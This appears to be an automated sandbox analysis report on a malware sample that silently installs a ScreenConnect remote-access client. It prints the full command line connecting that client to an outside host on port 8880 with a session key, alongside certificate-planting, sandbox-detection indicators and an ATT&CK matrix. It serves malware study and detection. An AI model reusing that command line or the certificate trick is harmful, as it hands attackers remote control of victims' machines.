                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: VMware
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.1775663963.000001BCBCC68000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1783154349.000001BCC0C31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1331266287.000000001AE64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003A1920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_003A1000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A37C7 mov eax, dword ptr fs:[00000030h]0_2_003A37C7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A69E3 GetProcessHeap,0_2_003A69E3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003A1493
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003A1920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A46C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003A46C3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\dgxvv1kr.nbq\a4e9zaca.q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\screenconnect.clientservice.exe" "?e=support&y=guest&h=miledin.mwhelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqc1bc7fdvjjfmjkdeqwcij3jjneml4x59nf7ggtnmjpuazxqdcf4oxznuaf7%2bpvugux9iql0n%2fv66hq12w0ziemc6tfje3cmndeozodx53g06q8buhtzh2x%2f%2b%2bqrazh38rwy8beaezwgd3uplgjgt802v5ryoiginnpsg2qeyjy4zp%2b13derrkttsv6uqi5ikxqwvcrjc%2fgnpsbkuxd%2f8jpqy4dtsbrmb9x3urpot2zflzmjv0lf10mnynoj1gz6q1%2bfaqncjp2sqix%2flzxsofe0atfkdojc3uhmzdhfuwsymenjpldauviud8llhjxaaew8kihkbgfg7ine6vysqaj&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\dgxvv1kr.nbq\a4e9zaca.q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\screenconnect.clientservice.exe" "?e=support&y=guest&h=miledin.mwhelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqc1bc7fdvjjfmjkdeqwcij3jjneml4x59nf7ggtnmjpuazxqdcf4oxznuaf7%2bpvugux9iql0n%2fv66hq12w0ziemc6tfje3cmndeozodx53g06q8buhtzh2x%2f%2b%2bqrazh38rwy8beaezwgd3uplgjgt802v5ryoiginnpsg2qeyjy4zp%2b13derrkttsv6uqi5ikxqwvcrjc%2fgnpsbkuxd%2f8jpqy4dtsbrmb9x3urpot2zflzmjv0lf10mnynoj1gz6q1%2bfaqncjp2sqix%2flzxsofe0atfkdojc3uhmzdhfuwsymenjpldauviud8llhjxaaew8kihkbgfg7ine6vysqaj&r=&i=" "1"Jump to behavior
                  Source: dfsvc.exe, 00000001.00000002.1781391219.000001BCBEA84000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.drBinary or memory string: Progman
                  Source: dfsvc.exe, 00000001.00000002.1781391219.000001BCBEA84000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_003A1807
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.2a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1766358365.000001BCA486A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1325286877.000000000256A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 7148, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6376, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 6924, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Windows Service                  		1
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager14
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Timestomp                  		NTDS41
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit                  		1
                  Scheduled Task/Job                  		1
